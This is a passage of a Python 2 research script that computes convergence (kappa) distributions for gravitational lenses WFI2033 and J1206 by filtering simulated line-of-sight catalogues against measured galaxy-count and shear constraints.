str(sys.argv[4])\nother = str(sys.argv[5]) # refers to an optional suffix for the shear constraint\ninnermask = str(sys.argv[6])\nradius = str(sys.argv[7])\nmag = str(sys.argv[8])\ncompmeas = str(sys.argv[9])\nmode = str(sys.argv[10])\nconjoined = len(sys.argv) - 11 # total number of arguments including code name, minus the number of ones that are not weights\n\nif handpicked == 'nohandpicked': handpickedstr = ''\nelse: handpickedstr = '_'+str(sys.argv[4])\n\nif conjoined == 1:\n weightin1 = str(sys.argv[11])\nif conjoined == 2:\n weightin1 = str(sys.argv[11])\n weightin2 = str(sys.argv[12])\nif conjoined == 3:\n weightin1 = str(sys.argv[11])\n weightin2 = str(sys.argv[12])\n weightin3 = str(sys.argv[13])\nif conjoined == 4:\n weightin1 = str(sys.argv[11])\n weightin2 = str(sys.argv[12])\n weightin3 = str(sys.argv[13])\n weightin4 = str(sys.argv[14])\n\nprint \"conjoined:\", conjoined\n#root = \"/lfs08/rusucs/%s/MSwghtratios/\" % lens\nroot = \"/Users/cerusu/Desktop/test/MSweights/\"\n#root = \"/Volumes/LaCieSubaru/MSweights/\"\n#rootcode = \"/mnt/scratch/rusucs/code/\"\n#rootcode = \"/lfs08/rusucs/code/\"\nrootcode = \"/Users/cerusu/Dropbox/Davis_work/code/J1206/\"\n#rootout = \"/lfs08/rusucs/%s/MSkapparesults/\" % lens\n#rootout = \"/Volumes/LaCieSubaru/kapparesults/\"\nrootout = \"/Users/cerusu/Desktop/test/kapparesults/\"\n#weightsfile = np.loadtxt(root+'weightedcounts_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nweightsfile = np.loadtxt(rootcode+'weightedcounts_%s_%ss_%s_%sinner%s_zgap%s_%s.cat' %(lens,mode,mag,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\n#weightsfile = np.loadtxt('/Users/cerusu/Dropbox/Davis_work/code/%s/weightedcounts_%s_%s_%s_%sinner%s_zgap%s_%s.cat' %(lens,lens,mode,mag,innermask,handpickedstr,zinf,zsup),usecols=[1,2,3,4,5,6],unpack=True) # the file where I recorded the overdensities which I measured for the real lens\nlimsigma = 2 # sigma limits on either side of the assumed gaussians\nbin_stat = 2000\nmin_kappa = -0.10\nmax_kappa = 1\n\nincrement1 = 1 # refers to the E interval from Greene et al. 2014\nincrement2 = 1\nincrement3 = 1\nincrement4 = 1\n\n# define the shear constraints\nif lens == \"WFI2033\":\n if other == 'fiducial' and handpicked == 'handpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.100\n constrwidth_gamma_inf = 0.090\n constrwidth_gamma_sup = 0.110\n if other == 'chameleon' and handpicked == 'handpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.128\n constrwidth_gamma_inf = 0.118\n constrwidth_gamma_sup = 0.138\n if other == 'fiducial' and (handpicked == 'removegrouphandpicked' or innermask == '15' or float(zsup) > 0):\n constr_gamma = 0.095\n constrwidth_gamma_inf = 0.085\n constrwidth_gamma_sup = 0.105\n if other == 'composite' and handpicked == 'handpicked' and float(zsup) < 0 and innermask == '5':\n constr_gamma = 0.148\n constrwidth_gamma_inf = 0.138\n constrwidth_gamma_sup = 0.158\n filters = \"ugrizJHK\"\n print 'shear: ',constr_gamma\nif lens == \"J1206\":\n filters = \"griK\"\n plane = 34\n constr_gamma = 0.04\n constrwidth_gamma_inf = 0.03\n constrwidth_gamma_sup = 0.05\n\n# declare which weights to read\nif radius == \"45\":\n measured_index = 0 # specifies the column index in weightsfile\n measured_index_inf = 1\n measured_index_sup = 2\nif radius == \"120\":\n measured_index = 3\n measured_index_inf = 4\n measured_index_sup = 5\n\nif lens != \"J1206\":\n def declareweight(weightin):\n if weightin == \"gal\": weight_index = 4\n if weightin == \"z\": weight_index = 6\n if weightin == \"mass\": weight_index = 8\n if weightin == \"mass2\": weight_index = 10\n if weightin == \"mass3\": weight_index = 12\n if weightin == \"oneoverr\": weight_index = 14\n if weightin == \"zoverr\": weight_index = 16\n if weightin == \"massoverr\": weight_index = 18\n if weightin == \"mass2overr\": weight_index = 20\n if weightin == \"mass3overr\": weight_index = 22\n if weightin == \"mass2rms\": weight_index = 24\n if weightin == \"mass3rms\": weight_index = 26\n if weightin == \"mass2overrrms\": weight_index = 28\n if weightin == \"mass3overrrms\": weight_index = 30\n if weightin == \"flexion\": weight_index = 32\n if weightin == \"tidal\": weight_index = 34\n if weightin == \"SIS\": weight_index = 36\n if weightin == \"SIShalo\": weight_index = 38\n if weightin == \"gamma\": weight_index = None\n return weight_index\nif lens == \"J1206\":\n def declareweight(weightin):\n if weightin == \"gal\": weight_index = 4\n if weightin == \"z\": weight_index = 5\n if weightin == \"oneoverr\": weight_index = 6\n if weightin == \"zoverr\": weight_index = 7\n if weightin == \"gamma\": weight_index = None\n return weight_index\n\nweight1_index = declareweight(weightin1)\nif conjoined >= 2:\n weight2_index = declareweight(weightin2)\n if conjoined >= 3:\n weight3_index = declareweight(weightin3)\n if conjoined == 4:\n weight4_index = declareweight(weightin4)\n\n# read weight constraints\nconstr_gal_meds = weightsfile[measured_index][0]\nconstrwidth_gal_meds_inf = weightsfile[measured_index_inf][0]\nconstrwidth_gal_meds_sup = weightsfile[measured_index_sup][0]\n\nconstr_z_meds = weightsfile[measured_index][1]\nconstrwidth_z_meds_inf = weightsfile[measured_index_inf][1]\nconstrwidth_z_meds_sup = weightsfile[measured_index_sup][1]\n\nconstr_mass_meds = weightsfile[measured_index][2]\nconstrwidth_mass_meds_inf = weightsfile[measured_index_inf][2]\nconstrwidth_mass_meds_sup = weightsfile[measured_index_sup][2]\n\nconstr_mass2_meds = weightsfile[measured_index][3]\nconstrwidth_mass2_meds_inf = weightsfile[measured_index_inf][3]\nconstrwidth_mass2_meds_sup = weightsfile[measured_index_sup][3]\n\nconstr_mass3_meds = weightsfile[measured_index][4]\nconstrwidth_mass3_meds_inf = weightsfile[measured_index_inf][4]\nconstrwidth_mass3_meds_sup = weightsfile[measured_index_sup][4]\n\nconstr_oneoverr_meds = weightsfile[measured_index][5]\nconstrwidth_oneoverr_meds_inf = weightsfile[measured_index_inf][5]\nconstrwidth_oneoverr_meds_sup = weightsfile[measured_index_sup][5]\n\nconstr_zoverr_meds = weightsfile[measured_index][6]\nconstrwidth_zoverr_meds_inf = weightsfile[measured_index_inf][6]\nconstrwidth_zoverr_meds_sup = weightsfile[measured_index_sup][6]\n\nconstr_massoverr_meds = weightsfile[measured_index][7]\nconstrwidth_massoverr_meds_inf = weightsfile[measured_index_inf][7]\nconstrwidth_massoverr_meds_sup = weightsfile[measured_index_sup][7]\n\nconstr_mass2overr_meds = weightsfile[measured_index][8]\nconstrwidth_mass2overr_meds_inf = weightsfile[measured_index_inf][8]\nconstrwidth_mass2overr_meds_sup = weightsfile[measured_index_sup][8]\n\nconstr_mass3overr_meds = weightsfile[measured_index][9]\nconstrwidth_mass3overr_meds_inf = weightsfile[measured_index_inf][9]\nconstrwidth_mass3overr_meds_sup = weightsfile[measured_index_sup][9]\n\nconstr_mass2rms_meds = weightsfile[measured_index][10]\nconstrwidth_mass2rms_meds_inf = weightsfile[measured_index_inf][10]\nconstrwidth_mass2rms_meds_sup = weightsfile[measured_index_sup][10]\n\nconstr_mass3rms_meds = weightsfile[measured_index][11]\nconstrwidth_mass3rms_meds_inf = weightsfile[measured_index_inf][11]\nconstrwidth_mass3rms_meds_sup = weightsfile[measured_index_sup][11]\n\nconstr_mass2overrrms_meds = weightsfile[measured_index][12]\nconstrwidth_mass2overrrms_meds_inf = weightsfile[measured_index_inf][12]\nconstrwidth_mass2overrrms_meds_sup = weightsfile[measured_index_sup][12]\n\nconstr_mass3overrrms_meds = weightsfile[measured_index][13]\nconstrwidth_mass3overrrms_meds_inf = weightsfile[measured_index_inf][13]\nconstrwidth_mass3overrrms_meds_sup = weightsfile[measured_index_sup][13]\n\nconstr_flexion_meds = weightsfile[measured_index][14]\nconstrwidth_flexion_meds_inf = weightsfile[measured_index_inf][14]\nconstrwidth_flexion_meds_sup = weightsfile[measured_index_sup][14]\n\nconstr_tidal_meds = weightsfile[measured_index][15]\nconstrwidth_tidal_meds_inf = weightsfile[measured_index_inf][15]\nconstrwidth_tidal_meds_sup = weightsfile[measured_index_sup][15]\n\nconstr_SIS_meds = weightsfile[measured_index][16]\nconstrwidth_SIS_meds_inf = weightsfile[measured_index_inf][16]\nconstrwidth_SIS_meds_sup = weightsfile[measured_index_sup][16]\n\nconstr_SIShalo_meds = weightsfile[measured_index][17]\nconstrwidth_SIShalo_meds_inf = weightsfile[measured_index_inf][17]\nconstrwidth_SIShalo_meds_sup = weightsfile[measured_index_sup][17]\n\ndef declareweight(weightin):\n if weightin == \"gal\": constr_weight = constr_gal_meds; constrwidth_weight_inf = constrwidth_gal_meds_inf; constrwidth_weight_sup = constrwidth_gal_meds_sup\n if weightin == \"z\": constr_weight = constr_z_meds; constrwidth_weight_inf = constrwidth_z_meds_inf; constrwidth_weight_sup = constrwidth_z_meds_sup\n if weightin == \"mass\": constr_weight = constr_mass_meds; constrwidth_weight_inf = constrwidth_mass_meds_inf; constrwidth_weight_sup = constrwidth_mass_meds_sup\n if weightin == \"mass2\": constr_weight = constr_mass2_meds; constrwidth_weight_inf = constrwidth_mass2_meds_inf; constrwidth_weight_sup = constrwidth_mass2_meds_sup\n if weightin == \"mass3\": constr_weight = constr_mass3_meds; constrwidth_weight_inf = constrwidth_mass3_meds_inf; constrwidth_weight_sup = constrwidth_mass3_meds_sup\n if weightin == \"oneoverr\": constr_weight = constr_oneoverr_meds; constrwidth_weight_inf = constrwidth_oneoverr_meds_inf; constrwidth_weight_sup = constrwidth_oneoverr_meds_sup\n if weightin == \"zoverr\": constr_weight = constr_zoverr_meds; constrwidth_weight_inf = constrwidth_zoverr_meds_inf; constrwidth_weight_sup = constrwidth_zoverr_meds_sup\n if weightin == \"massoverr\": constr_weight = constr_massoverr_meds; constrwidth_weight_inf = constrwidth_massoverr_meds_inf; constrwidth_weight_sup = constrwidth_massoverr_meds_sup\n if weightin == \"mass2overr\": constr_weight = constr_mass2overr_meds; constrwidth_weight_inf = constrwidth_mass2overr_meds_inf; constrwidth_weight_sup = constrwidth_mass2overr_meds_sup\n if weightin == \"mass3overr\": constr_weight = constr_mass3overr_meds; constrwidth_weight_inf = constrwidth_mass3overr_meds_inf; constrwidth_weight_sup = constrwidth_mass3overr_meds_sup\n if weightin == \"mass2rms\": constr_weight = constr_mass2rms_meds; constrwidth_weight_inf = constrwidth_mass2rms_meds_inf; constrwidth_weight_sup = constrwidth_mass2rms_meds_sup\n if weightin == \"mass3rms\": constr_weight = constr_mass3rms_meds; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup\n if weightin == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup\n if weightin == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup\n if weightin == \"flexion\": constr_weight = constr_flexion_meds; constrwidth_weight_inf = constrwidth_flexion_meds_inf; constrwidth_weight_sup = constrwidth_flexion_meds_sup\n if weightin == \"tidal\": constr_weight = constr_tidal_meds; constrwidth_weight_inf = constrwidth_tidal_meds_inf; constrwidth_weight_sup = constrwidth_tidal_meds_sup\n if weightin == \"SIS\": constr_weight = constr_SIS_meds; constrwidth_weight_inf = constrwidth_SIS_meds_inf; constrwidth_weight_sup = constrwidth_SIS_meds_sup\n if weightin == \"SIShalo\": constr_weight = constr_SIShalo_meds; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup\n if weightin == \"gamma\": constr_weight = constr_gamma; constrwidth_weight_inf = constrwidth_gamma_inf; constrwidth_weight_sup = constrwidth_gamma_sup\n return constr_weight, constrwidth_weight_inf, constrwidth_weight_sup\n\nif conjoined == 4: constr_weight4, constrwidth_weight4_inf, constrwidth_weight4_sup = declareweight(weightin4)\nif (conjoined == 3) | (conjoined == 4): constr_weight3, constrwidth_weight3_inf, constrwidth_weight3_sup = declareweight(weightin3)\nif (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight2, constrwidth_weight2_inf, constrwidth_weight2_sup = declareweight(weightin2)\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3) | (conjoined == 4): constr_weight1, constrwidth_weight1_inf, constrwidth_weight1_sup = declareweight(weightin1)\n\nprint \"Reading...\"\n\nif conjoined == 4:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,weightin4,mag,radius,mode,increment1,increment2,increment3,increment4)\nif conjoined == 3:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,weightin3,mag,radius,mode,increment1,increment2,increment3)\nif conjoined == 2:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_%s_increments%s_%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,weightin2,mag,radius,mode,increment1,increment2)\nif conjoined == 1:\n output = '%skappahist_%s_%s_%sinnermask_nobeta%s_zgap%s_%s_%s_%s_%s_%s_%s_increments%s_testinvertxyrandom.cat' % (rootout,lens,compmeas,innermask,handpickedstr,zinf,zsup,other,weightin1,mag,radius,mode,increment1)\n\ndef readfile(file,usecols):\n f = fitsio.FITS(file)\n print f # I need to print it, or f.hdu_list will not read\n ext = len(f.hdu_list)\n for i in range(ext - 1):\n if i == 0:\n data = fitsio.read(file, columns=usecols, ext=i+1)\n else:\n data = np.r_[data,fitsio.read(file, columns=usecols, ext=i+1)]\n # for speed, fitsio always returns columns and rows in order, so for instance in [1,2,3] even when usecols=[2,3,1]\n sort = np.argsort(np.argsort(usecols))\n if len(usecols) == 1:\n return data[data.dtype.names[0]]\n if len(usecols) == 2:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]]\n if len(usecols) == 3:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]]\n if len(usecols) == 4:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]]\n if len(usecols) == 5:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]]\n if len(usecols) == 6:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]]\n\nif conjoined == 1:\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n med1 = np.zeros(8)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin1 != \"gamma\":\n weight1_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index])\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[2,3])\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n #print j,i\n if weightin1 != \"gamma\":\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n if weightin1 == \"gamma\":\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights, so that it is meaningful to multiply by med_weight1\n constrwidth_weight1_inf = constrwidth_weight1_inf / med_weight1\n constrwidth_weight1_sup = constrwidth_weight1_sup / med_weight1\n del weight1_1\n del weight1_1_\n del weight1_2\n del weight1_2_\n else:\n del weight1\n del weight1_\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. of galaxies within the lower width\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n \n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. I consider the full range of the constraint.'''\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin1 != \"gamma\":\n kappa_, weight1_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index))\n weight1_ = weight1_ / med_weight1\n else:\n kappa_, gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n\nif conjoined == 2:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n weight1_,weight2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n else:\n weight1_,weight2_1_,weight2_2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=[weight1_index,2,3])\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n #print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n if weightin2 == \"gamma\":\n del weight1\n del weight1_\n del weight2_1\n del weight2_1_\n del weight2_2\n del weight2_2_\n else:\n del weight1\n del weight1_\n del weight2\n del weight2_\n\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n else:\n kappa_, weight1_,gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n print np.shape(kappa_)\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n del weight\n if (i == 0) and (j == 0):\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n else:\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n #print j,i\n if weightin1 == \"gamma\":\n del weight1_\n del weight2_\n del gamma1\n del gamma1_\n del gamma2\n del gamma2_\n del gamma\n else:\n del weight1_\n del weight2_\n\n\nif conjoined == 3:\n med1 = np.zeros(8)\n med2 = np.zeros(8)\n med3 = np.zeros(8)\n filters1 = \"ugriz\"\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n weight1_,weight2_,weight3_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,weight2_index,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(weight1_index,2,3,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n if weightin2 != \"gamma\":\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n if weightin2 == \"gamma\":\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n if weightin2 == \"gamma\":\n del weight1\n del weight1_\n del weight2_1\n del weight2_1_\n del weight2_2\n del weight2_2_\n del weight3\n del weight3_\n else:\n del weight1\n del weight1_\n del weight2\n del weight2_\n del weight3\n del weight3_\n\n filters1 = filters\n for j in range(1):\n for i in range(1):\n if weightin2 != \"gamma\":\n kappa_, weight1_,weight2_,weight3_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight2_index,weight3_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n kappa_, weight1_,weight3_,gamma1_,gamma2_ = readfile(\"%snobeta%s%s%sinject_%s_%s_GGL_los_8_%s_%s_%s_%s_%sarcsecinner_gap_%s_%s_testinvertxyrandom.fits\" % (root,str(plane),compmeas,mode,filters1,lens,str(j),str(i),mag,radius,innermask,zinf,zsup), usecols=(1,weight1_index,weight3_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n del weight\n weight = np.copy(weight2_)\n print 